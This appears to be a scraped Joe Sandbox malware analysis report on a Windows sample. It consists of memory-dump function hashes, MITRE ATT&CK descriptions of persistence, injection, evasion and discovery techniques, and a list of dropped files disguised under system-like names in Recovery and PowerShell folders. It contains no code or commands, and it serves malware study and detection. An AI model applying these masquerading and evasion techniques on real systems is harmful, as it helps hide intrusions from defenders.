Source File: 00000024.00000002.2101002302.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bac0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815e38644dce26efcebaf115a126d9d21d29ba7f79a8c1d0aefcc60cc11ee5f8
Instruction ID: 2945800cdb01b04030df196d51811ae2cd76ebc8b1934d160dd54b7a9b9a3c97
Opcode Fuzzy Hash: 815e38644dce26efcebaf115a126d9d21d29ba7f79a8c1d0aefcc60cc11ee5f8
Instruction Fuzzy Hash: 53E04F3170EC1B46F7B1B75898605BE3293FBD0321F164735D019C32A5DEB8A7064A85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEA410 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEDC49 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074c3f5ed14d887cc37d767d786025ef4dbb033bedcd2f917e70dfd424ac5c5c
Instruction ID: 8d0326039f87b99b17be950fa7e585e45da4f34dec21ed4764a020a06680ecfc
Opcode Fuzzy Hash: 074c3f5ed14d887cc37d767d786025ef4dbb033bedcd2f917e70dfd424ac5c5c
Instruction Fuzzy Hash: 13E0462694A3C04FC70B9B3588A98947F60DE6721078A40EBC045CF2B3EA29884EC712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEDBC9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1a7c0fa30c2fe3a4384bb2d34dbcd7e5f7a2bc95ee75fd3f4c3360428f16cd
Instruction ID: 271ba9feed590bdb287e98334819e6e797c131eba01e91f3d48760f1445ab95d
Opcode Fuzzy Hash: bd1a7c0fa30c2fe3a4384bb2d34dbcd7e5f7a2bc95ee75fd3f4c3360428f16cd
Instruction Fuzzy Hash: ECE0462694F3C04FC70B9B3588A98947F609E6B21078A40EBC085CF2B3EA698C4DC712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE2509 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7cb3fb04fe79f26074d6f9d00e74d2262422d4c49eb1011296b0eae38c9ac0
Instruction ID: 4f67e722220e71bdb7a99f61c9b367a7cbb8db005ccfa788c31c396b1289a746
Opcode Fuzzy Hash: 2c7cb3fb04fe79f26074d6f9d00e74d2262422d4c49eb1011296b0eae38c9ac0
Instruction Fuzzy Hash: 45E01A7154E3C08FCB0AAB7488699447F70AE6721078F41DEC089CF1B3D62D8949CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEA4A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE92B9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c7dcfdaf56463943d3e6109d71718e7cdaab916ef90bfd00fc1bc82425306d
Instruction ID: a16179b5389d2237243c0c04d15506c97c73b9d73ef9f94cfc157c7cc3474ad1
Opcode Fuzzy Hash: c1c7dcfdaf56463943d3e6109d71718e7cdaab916ef90bfd00fc1bc82425306d
Instruction Fuzzy Hash: 09E0123154A6854FC70A9F25C8A99903BB0EF67215B8701D6C005CB5B3D61D9C49C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction ID: b9076bb1c95e560591f5221719662cd476531f0d4c41bf05724fc0057ce3a647
Opcode Fuzzy Hash: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction Fuzzy Hash: 69D0A73021994E4FD644B778C8594247BA0FB0F210FC510E5E048C7562C54848558704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE4570 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE2520 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEBAB0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd39a96c55ec30867847dabadf1d4698c514dbc5cbc52b06250146bb9656da2
Instruction ID: 909ed31336686bbc90c42df4a1be759957de5b99fc8b046493f0193044aecc16
Opcode Fuzzy Hash: ddd39a96c55ec30867847dabadf1d4698c514dbc5cbc52b06250146bb9656da2
Instruction Fuzzy Hash: 13D02230B508080FC71CA73888688303390EB6A20278100A8D00AC72B2E96ADC88C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE4988 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bae1000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d03eb65ae8bb186dc92644efd7b45e7c81ace32d403a609f1041a8b1e86fb07
Instruction ID: 557cd1974c044048b8c8f205777c384a3ec8a6e4dc44975f127aed718413c524
Opcode Fuzzy Hash: 2d03eb65ae8bb186dc92644efd7b45e7c81ace32d403a609f1041a8b1e86fb07
Instruction Fuzzy Hash: 24D01235B519044FC71CA738985D8747391EBAA216B9540A9D00AC72B1DA6AED89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction ID: 5fccbbb644babd995041c4b3b2f78ac692072bf53c39c3f1b826ed133ed64a03
Opcode Fuzzy Hash: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction Fuzzy Hash: DAC01200F0B52E00E43533AB14620ACB1009BC4A10FD30032D028800A19CDE22860A4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC46EE Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bac0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d4b07931f53e8a926252e6083844231f101afeafb0d21017ceccfbcb05cf65
Instruction ID: f8509d3168db79def38e81505e8880126034d13c757bbd7e6106f396cdbc9b53
Opcode Fuzzy Hash: 67d4b07931f53e8a926252e6083844231f101afeafb0d21017ceccfbcb05cf65
Instruction Fuzzy Hash: 57D0C730B0990D4BEB54FF589950AB52270EF44345F110474E85EC7167CD78D9124715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction ID: 34fa1270555fac5b67c09feb4ee5f9a1c3adfb7c9d234e0b3247384a603f9e85
Opcode Fuzzy Hash: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction Fuzzy Hash: 38C08C3051580C8FC908EB29C88880433A0FB09314BC20090E008C7170D659DCC0CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction ID: 93d885a342472b3bac7bf24b73f096ccce37ca4456aa100108ed7523daeb1a91
Opcode Fuzzy Hash: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction Fuzzy Hash: ABB01200D5741F00E43833FB089206D70409B44200FC20070D42C80091DCCE12950746

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB25F3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction ID: 0f7afb7f4e565fa9430ba012f81a28ffde5d17b8c0989f08add91e7c966f9626
Opcode Fuzzy Hash: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAB0B3E
!k9, xrefs: 00007FFD9BAB0B4E
"s9, xrefs: 00007FFD9BAB0B46
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000024.00000002.2101002302.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bab0000_SwjJGfgwqbpLdPqvPFcqLsY.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 172afb7c48d46dcb5e701e1a886507b7f7fe464e15fbb7c66946b06cd890a319
Instruction ID: 01b29ca99a652b961a981d1ca390e38edd8ccb7777299f72f068ef650e313b25
Opcode Fuzzy Hash: 172afb7c48d46dcb5e701e1a886507b7f7fe464e15fbb7c66946b06cd890a319
Instruction Fuzzy Hash: 4A41BD07B0953646E23973FD78219ED9B848FA927FB0847BBF56E8D0C74C486081C2E9

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yX8787W7de.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\088424020bedd6

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe

C:\Program Files\Internet Explorer\en-US\31d454e2f3d20a

C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe

C:\Recovery\31d454e2f3d20a

C:\Recovery\9e60a5f7a3bd80

C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe

C:\Recovery\SystemSettings.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MsintoRefcommonsvc.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SwjJGfgwqbpLdPqvPFcqLsY.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Windows Analysis Report
yX8787W7de.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

